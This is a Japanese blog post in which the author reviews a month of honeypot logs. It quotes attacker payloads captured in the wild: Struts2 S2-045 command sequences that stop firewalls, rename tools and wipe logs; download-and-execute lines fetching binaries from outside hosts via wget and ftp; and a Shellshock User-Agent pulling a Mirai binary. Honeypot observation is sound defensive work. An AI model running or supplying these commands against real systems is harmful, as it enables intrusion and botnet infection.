ハニーポット観察日記 (2017年12月分)

honeypot security shellshock Struts2 WOWHoney 技術メモ

新年のご挨拶

明けましておめでとうございます! 平成30年も k-anz.net をよろしくお願いします!

さて、さっそく前回の宣言通り、ハニーポットの観察記録を書きたいと思います。一旦、前月分(2017年12月分)のログを対象に、気になったものや、数の多かったものをピックアップしてコメントしていきます。

Apache Struts 2 の脆弱性 (S2-045) を狙った攻撃

遠隔の攻撃者が、細工した HTTP リクエストを送信することで、Apache Struts 2 を使用するアプリケーション (Strutsアプリケーション) を実行しているサーバにおいて、任意のコードを実行する可能性があります。

Apache Struts 2 の脆弱性 (S2-045) に関する注意喚起 (JPCERTの記事にジャンプします)

もっとも多かったのがこの脆弱性を狙った攻撃でした。Content-TypeヘッダにOGNL式を含むコードが指定されており、脆弱性を持つ Struts2 アプリケーションの場合、記載されたコマンドが実行可能となってしまいます。実行を試みられていたコマンドにいくつかパターンがあったのでご紹介します。以下、コマンドのみを抜粋して記載します。

その1

whoami
service iptables stop
/etc/init.d/iptables stop
mv /bin/netstat /bin/tstat
mv /usr/bin/wget /usr/bin/scet
mv /usr/bin/scp /usr/bin/lcp
mv /usr/bin/curl /usr/bin/cuy
echo > /var/log/wtmp
echo >/var/log/wtmp
echo > ./.bash_history
history -c

同一IPから連続したアクセスがあり、(1) whoami (2) service ipdtables stop ... という形で順に攻撃が来ていました。こういうのって、はじめに whoami で攻撃可能なプログラムかどうかを判断し、そのあとから実作業に入っているのですかね……?

ファイアウォールを止めて、mv ~ 以降は各種コマンドの書き換えをしているのでしょうか。最後は、一時ファイルや履歴などの痕跡をクリアしてさようなら、ですね。

その2

/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://xxx.xxx.xxx.xxx:20081/inten;chmod 777 inten;./inten;

ファイアウォールを止めたあとにファイルをダウンロードし、実行権限つけて実行、という流れですね。ダウンロードを試みられていたファイルがどのようなものかは確認が取れませんでした……。

その3

cmd /c @echo open h.c.ac.cn>>COOKECOOKE.dat&@echo 123>>COOKECOOKE.dat&@echo 123>>COOKECOOKE.dat&echo bin>>COOKECOOKE.dat&@echo get 7ua.exe>>COOKECOOKE.dat&@echo bye>>COOKECOOKE.dat&@echo 7ua.exe>>COOKECOOKE.dat&@ftp -s:COOKECOOKE.dat&del COOKECOOKE.dat&7ua.exe&7ua.exe

こちらは Windows 向けのコマンドのようですね。やろうとしていることは、その2のログとそれほど変わらないようで、ファイルをダウンロードして実行、最後に使用したファイルを削除、という感じでしょうか。

ShellShock を狙った攻撃

GET / HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: () { :; }; /bin/sh -c 'wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;wget1 http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;curl http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin -o /dev/null;/usr/sfwbin/wget http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin;fetch -/dev/null http://easavi.gq/wp-admin?infect-cctv=mirai-botnet.bin'
Connection: close

bashに存在する脆弱性 「Shellshock」 | トレンドマイクロ セキュリティブログ

User-Agent にコードを仕込む形は、典型的な ShellShock を狙った攻撃のようですね。wget, curlなど手段を変えながら、特定のサイトへアクセスを試行しています。

「infect-cctv=mirai-botnet.bin」というクエリパラメータが気になります。「Miraiボットネット」というのは、2016年秋頃に話題になった、IoTデバイスを踏み台としたDDoS攻撃を行うボットネットだそうなのですが、このアクセスもそれに関連したものなのでしょうか……

時候の挨拶?

PATCH /your-software/and-have-a-great-2018/from-the-folks-at-34c3 HTTP/1.0
User-Agent: #34c3
Accept: */*

"Have a great 2018 from the folks at 34c3"

「良いお年を」のご挨拶でしょうか。ご丁寧にどうも……という感じですね。

34c3 というのは、「34th Chaos Communication Congress」のこと。「Chaos Communication Congress」とは、「Chaos Computer Club」というハッカー集団のコンペティションだそうです。要出典のマークだらけですが、カオス・コンピュータ・クラブの Wikipedia 記事の内容はなかなかすごいですね。

CCCが世界的に有名になったきっかけは、彼らがある銀行[どこ?]のコンピュータネットワークに侵入し、オンラインアカウントのID・パスワードを取得、見事現金を得るのに成功するという事件だった[いつ?]。その事件の翌日、彼らは得た金を銀行に返却した。

カオス・コンピュータ・クラブ - Wikipedia

まるでMR.ROBOTの5/9攻撃みたいじゃないですか……! どちらかといえば CCC の事件のほうが先なのでしょうけど。

おわりに

というわけではじめてのハニーポット観察日記でした。「セキュリティに留意したコードを書く」といったことは、開発の仕事でも意識しているところではあるのですが、こうして実際のログを観察してみると、より一層気持ちが引き締まりますね。

また月次くらいのペースで、新しく紹介記事を書けたらと思っています。ではでは。